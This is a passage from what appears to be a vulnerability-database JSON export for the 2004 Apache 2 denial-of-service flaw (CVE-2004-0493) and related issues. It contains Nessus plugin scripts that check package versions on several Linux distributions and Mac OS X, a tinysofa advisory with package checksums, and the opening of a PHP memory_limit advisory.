reference:\"apache2-devel-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-manual-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_cache-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_dav-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_deflate-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_disk_cache-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_file_cache-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_ldap-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_mem_cache-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_proxy-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_ssl-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-modules-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-source-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64apr0-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libapr0-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:39:13", "references": ["http://www.guninski.com/httpd1.html", "https://security.gentoo.org/glsa/200407-03"], "pluginID": "14536", "description": "The remote host is affected by the vulnerability described in GLSA-200407-03 (Apache 2: Remote denial of service attack)\n\n A bug in the protocol.c file handling header lines will cause Apache to allocate memory for header lines starting with TAB or SPACE.\n Impact :\n\n An attacker can exploit this vulnerability to perform a Denial of Service attack by causing Apache to exhaust all memory. On 64 bit systems with more than 4GB of virtual memory a possible integer signedness error could lead to a buffer based overflow causing Apache to crash and under some circumstances execute arbitrary code as the user running Apache, usually 'apache'.\n Workaround :\n\n There is no known workaround at this time. All users are encouraged to upgrade to the latest available version:", "edition": 5, "reporter": "Tenable", "published": "2004-08-30T00:00:00", "title": "GLSA-200407-03 : Apache 2: Remote denial of service attack", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:apache"], "id": "GENTOO_GLSA-200407-03.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14536", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200407-03.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14536);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/10 18:07:05\");\n\n script_cve_id(\"CVE-2004-0493\");\n script_xref(name:\"GLSA\", value:\"200407-03\");\n\n script_name(english:\"GLSA-200407-03 : Apache 2: Remote denial of service attack\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200407-03\n(Apache 2: Remote denial of service attack)\n\n A bug in the protocol.c file handling header lines will cause Apache to\n allocate memory for header lines starting with TAB or SPACE.\n \nImpact :\n\n An attacker can exploit this vulnerability to perform a Denial of Service\n attack by causing Apache to exhaust all memory. On 64 bit systems with more\n than 4GB of virtual memory a possible integer signedness error could lead\n to a buffer based overflow causing Apache to crash and under some\n circumstances execute arbitrary code as the user running Apache, usually\n 'apache'.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version:\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.guninski.com/httpd1.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200407-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Apache 2 users should upgrade to the latest version of Apache:\n # emerge sync\n # emerge -pv '>=www-servers/apache-2.0.49-r4'\n # emerge '>=www-servers/apache-2.0.49-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/06/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 2.0.49-r4\", \"lt 2\"), vulnerable:make_list(\"le 2.0.49-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache 2\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:39:03", "references": ["https://www.redhat.com/security/data/cve/CVE-2004-0493.html", "http://www.apacheweek.com/features/security-20", "https://www.redhat.com/security/data/cve/CVE-2004-0488.html", "http://rhn.redhat.com/errata/RHSA-2004-342.html"], "pluginID": "12636", "description": "Updated httpd packages that fix a buffer overflow in mod_ssl and a remotely triggerable memory leak are now available.\n\nThe Apache HTTP server is a powerful, full-featured, efficient, and freely-available Web server.\n\nA stack-based buffer overflow was discovered in mod_ssl that could be triggered if using the FakeBasicAuth option. If mod_ssl was sent a client certificate with a subject DN field longer than 6000 characters, a stack overflow occured if FakeBasicAuth had been enabled. In order to exploit this issue the carefully crafted malicious certificate would have had to be signed by a Certificate Authority which mod_ssl is configured to trust. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0488 to this issue.\n\nA remotely triggered memory leak in the Apache HTTP Server earlier than version 2.0.50 was also discovered. This allowed a remote attacker to perform a denial of service attack against the server by forcing it to consume large amounts of memory. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0493 to this issue.\n\nUsers of the Apache HTTP server should upgrade to these updated packages, which contain backported patches that address these issues.", "edition": 6, "reporter": "Tenable", "published": "2004-07-06T00:00:00", "title": "RHEL 3 : httpd (RHSA-2004:342)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493", "CVE-2004-0488"], "modified": "2018-08-13T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-devel"], "id": "REDHAT-RHSA-2004-342.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12636", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:342. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12636);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2004-0488\", \"CVE-2004-0493\");\n script_xref(name:\"RHSA\", value:\"2004:342\");\n\n script_name(english:\"RHEL 3 : httpd (RHSA-2004:342)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix a buffer overflow in mod_ssl and a\nremotely triggerable memory leak are now available.\n\nThe Apache HTTP server is a powerful, full-featured, efficient, and\nfreely-available Web server.\n\nA stack-based buffer overflow was discovered in mod_ssl that could be\ntriggered if using the FakeBasicAuth option. If mod_ssl was sent a\nclient certificate with a subject DN field longer than 6000\ncharacters, a stack overflow occured if FakeBasicAuth had been\nenabled. In order to exploit this issue the carefully crafted\nmalicious certificate would have had to be signed by a Certificate\nAuthority which mod_ssl is configured to trust. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0488 to this issue.\n\nA remotely triggered memory leak in the Apache HTTP Server earlier\nthan version 2.0.50 was also discovered. This allowed a remote\nattacker to perform a denial of service attack against the server by\nforcing it to consume large amounts of memory. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0493 to this issue.\n\nUsers of the Apache HTTP server should upgrade to these updated\npackages, which contain backported patches that address these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2004-0488.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2004-0493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apacheweek.com/features/security-20\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2004-342.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd, httpd-devel and / or mod_ssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:342\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"httpd-2.0.46-32.ent.3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"httpd-devel-2.0.46-32.ent.3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"mod_ssl-2.0.46-32.ent.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / mod_ssl\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:57:20", "references": ["http://www.guninski.com/httpd1.html"], "pluginID": "12293", "description": "The remote host appears to be running a version of Apache 2.x that is prior to 2.0.50. It is, therefore, affected by a denial of service vulnerability that can be triggered by sending a specially crafted HTTP request, which results in the consumption of an arbitrary amount of memory. On 64-bit systems with more than 4GB virtual memory, this may lead to a heap based buffer overflow.\n\nThere is also a denial of service vulnerability in mod_ssl's 'ssl_io_filter_cleanup' function. By sending a request to a vulnerable server over SSL and closing the connection before the server can send a response, an attacker can cause a memory violation that crashes the server.", "edition": 9, "reporter": "Tenable", "published": "2004-06-29T00:00:00", "title": "Apache 2.x < 2.0.50 Multiple Remote DoS", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493", "CVE-2004-0748"], "modified": "2018-06-29T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_INPUT_HEADER_FOLDING_DOS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12293", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12293);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/06/29 12:01:03\");\n\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0748\");\n script_bugtraq_id(10619, 12877);\n \n script_name(english:\"Apache 2.x < 2.0.50 Multiple Remote DoS\");\n script_summary(english:\"Checks for version of Apache\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a denial of service.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a version of Apache 2.x that is\nprior to 2.0.50. It is, therefore, affected by a denial of service\nvulnerability that can be triggered by sending a specially crafted\nHTTP request, which results in the consumption of an arbitrary amount\nof memory. On 64-bit systems with more than 4GB virtual memory, this\nmay lead to a heap based buffer overflow.\n\nThere is also a denial of service vulnerability in mod_ssl's\n'ssl_io_filter_cleanup' function. By sending a request to a vulnerable\nserver over SSL and closing the connection before the server can send\na response, an attacker can cause a memory violation that crashes the\nserver.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.guninski.com/httpd1.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache 2.0.50 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/06/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/06/28\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n\n script_dependencies(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\nbanner = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n \nif(pgrep(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/2\\.0\\.(([0-9][^0-9])([0-3][0-9][^0-9])|(4[0-9][^0-9])).*\", string:banner))\n{\n security_warning(port);\n exit(0);\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:00:09", "references": ["http://www.nessus.org/u?210abeb5"], "pluginID": "14676", "description": "The remote host is missing Security Update 2004-09-07. This security update fixes the following components :\n\n - CoreFoundation\n - IPSec\n - Kerberos\n - libpcap\n - lukemftpd\n - NetworkConfig\n - OpenLDAP\n - OpenSSH\n - PPPDialer\n - rsync\n - Safari\n - tcpdump\n\nThese applications contain multiple vulnerabilities that may allow a remote attacker to execute arbitrary code.", "edition": 6, "reporter": "Tenable", "published": "2004-09-08T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2004-09-07)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0825", "CVE-2004-0824", "CVE-2004-0184", "CVE-2004-0794", "CVE-2004-0183", "CVE-2004-0493", "CVE-2004-0823", "CVE-2004-0361", "CVE-2004-0822", "CVE-2004-0607", "CVE-2004-0523", "CVE-2004-0426", "CVE-2004-0488", "CVE-2004-0821", "CVE-2004-0175", "CVE-2004-0521", "CVE-2004-0720"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD20040907.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14676", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(14676);\n script_version (\"1.25\");\n\n script_cve_id(\"CVE-2004-0175\", \"CVE-2004-0183\", \"CVE-2004-0184\", \"CVE-2004-0361\", \"CVE-2004-0426\", \n \"CVE-2004-0488\", \"CVE-2004-0493\", \"CVE-2004-0521\", \"CVE-2004-0523\", \"CVE-2004-0607\",\n \"CVE-2004-0720\", \"CVE-2004-0794\", \"CVE-2004-0821\", \"CVE-2004-0822\", \"CVE-2004-0823\",\n \"CVE-2004-0824\", \"CVE-2004-0825\");\n script_bugtraq_id(9815, 9986, 10003, 10004, 10247, 10397, 11135, 11136, 11137, 11138, 11139, 11140);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2004-09-07)\");\n script_summary(english:\"Check for Security Update 2004-09-07\");\n \n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes a security\nissue.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The remote host is missing Security Update 2004-09-07. This security\nupdate fixes the following components :\n\n - CoreFoundation\n - IPSec\n - Kerberos\n - libpcap\n - lukemftpd\n - NetworkConfig\n - OpenLDAP\n - OpenSSH\n - PPPDialer\n - rsync\n - Safari\n - tcpdump\n\nThese applications contain multiple vulnerabilities that may allow\na remote attacker to execute arbitrary code.\" );\n # http://web.archive.org/web/20080915104713/http://support.apple.com/kb/HT1646?\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?210abeb5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install Security Update 2004-09-07.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(22);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/09/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2004/09/08\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\nuname = get_kb_item(\"Host/uname\");\n# MacOS X 10.2.8, 10.3.4 and 10.3.5 only\nif ( egrep(pattern:\"Darwin.* (6\\.8\\.|7\\.[45]\\.)\", string:uname) )\n{\n if ( ! egrep(pattern:\"^SecUpd(Srvr)?2004-09-07\", string:packages) ) security_hole(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "references": [], "description": " ===========================================================================\r\n _ \r\n |_ . _ _ _ (_ _ \r\n |_ | | ) \/ _) (_) | (_| \r\n / \r\n\r\n\r\n Security Advisory #2004-012\r\n\r\n Package name: apache / httpd\r\n Summary: Denial Of Service\r\n Advisory ID: TSSA-2004-012\r\n Date: 2004-06-29\r\n Affected versions: tinysofa enterprise server 1.0\r\n tinysofa enterprise server 1.0-U1\r\n tinysofa enterprise server 1.0-U2\r\n tinysofa enterprise server 2.0-pre1\r\n\r\n ===========================================================================\r\n\r\n Security Fixes\r\n ============== \r\n\r\n Description\r\n -----------\r\n\r\n apache:\r\n * A remote exploit has been discovered in the Apache HTTP server [0] \r\n which allows an attacker to cause the server to allocate increasing\r\n amounts of memory until system memory is exhausted or until process\r\n limits are reached.\r\n\r\n This problem has been assigned the name CAN-2004-0493 [1] by the \r\n Common Vulnerabilities and Exposures (CVE) project.\r\n\r\n References\r\n ----------\r\n [0] http://httpd.apache.org/\r\n [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0493\r\n\r\n Recommended Action\r\n ==================\r\n\r\n We recommend that all systems with these packages installed be upgraded.\r\n Please note that if you do not need the functionality provided by this\r\n package, you may want to remove it from your system.\r\n\r\n\r\n Location\r\n ========\r\n\r\n All tinysofa updates are available from\r\n <URI:http://http.tinysofa.org/pub/tinysofa/updates/>\r\n <URI:ftp://ftp.tinysofa.org/pub/tinysofa/updates/>\r\n\r\n\r\n Automatic Updates\r\n =================\r\n\r\n Users of the SWUP tool can enjoy having updates automatically\r\n installed using 'swup --upgrade'.\r\n\r\n Users of the APT tool may use the 'apt-get upgrade' command.\r\n\r\n Questions?\r\n ==========\r\n\r\n Check out our mailing lists:\r\n <URI:http://www.tinysofa.org/support/>\r\n\r\n\r\n Verification\r\n ============\r\n\r\n This advisory is signed with the tinysofa security sign key.\r\n This key is available from:\r\n <URI:http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xAEDCBB4B>\r\n\r\n All tinysofa packages are signed with the tinysofa stable sign key.\r\n This key is available from:\r\n <URI:http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x0F1240A2>\r\n\r\n The advisory is available from the tinysofa errata database at\r\n <URI:http://www.tinysofa.org/support/errata/>\r\n or directly at\r\n <URI:http://www.tinysofa.org/support/errata/2004/012.html>\r\n\r\n\r\n MD5sums Of The Packages\r\n =======================\r\n\r\n [server-1.0]\r\n\r\n ebc6032e2b8581955df97921bd194fda apache-2.0.49-14ts.i586.rpm\r\n 581dfd444acf8e5d22bd1f2ce34a7213 apache-dbm-2.0.49-14ts.i586.rpm\r\n 079c2e42a23afbe60f8f8b98b9287410 apache-devel-2.0.49-14ts.i586.rpm\r\n 4956d084928e6f3591cf112d211496a5 apache-manual-2.0.49-14ts.i586.rpm\r\n e36c1e88e598907e7ec44b13eca9d64b apr-0.9.5-14ts.i586.rpm\r\n acdac3d099decb442e271febc18696d9 apr-devel-0.9.5-14ts.i586.rpm\r\n b45a7a65fe3cc2bc435bdabb79535373 apr-util-0.9.5-14ts.i586.rpm\r\n 5110e06e4d7bf2b24e8298cc2c0b54f4 apr-util-devel-0.9.5-14ts.i586.rpm\r\n\r\n [server-2.0]\r\n\r\n dc3bf12c0df7ea363da38382e11ed5d4 httpd-2.0.49-8ts.i386.rpm\r\n 0cb2829c70eed23a3a839ee0e3cb755a httpd-devel-2.0.49-8ts.i386.rpm\r\n 6f4915a3221629c2a56b4ccc517509f4 httpd-manual-2.0.49-8ts.i386.rpm\r\n 62df1e70370c41795e6abff6950e925b mod_ssl-2.0.49-8ts.i386.rpm\r\n\r\n --\r\n tinysofa Security Team <security at tinysofa dot org>", "edition": 1, "reporter": "Securityvulns", "published": "2004-06-30T00:00:00", "title": "TSSA-2004-012 - apache", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:10", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2004-0493"], "modified": "2004-06-30T00:00:00", "id": "SECURITYVULNS:DOC:6421", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6421", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:10", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n e-matters GmbH\r\n www.e-matters.de\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: PHP memory_limit remote vulnerability\r\n Release Date: 2004/07/14\r\nLast Modified: 2004/07/14\r\n Author: Stefan Esser [s.esser@e-matters.de]\r\n\r\n Application: PHP <= 4.3.7\r\n PHP5 <= 5.0.0RC3\r\n Severity: A vulnerability within PHP allows remote code\r\n execution on PHP servers with activated 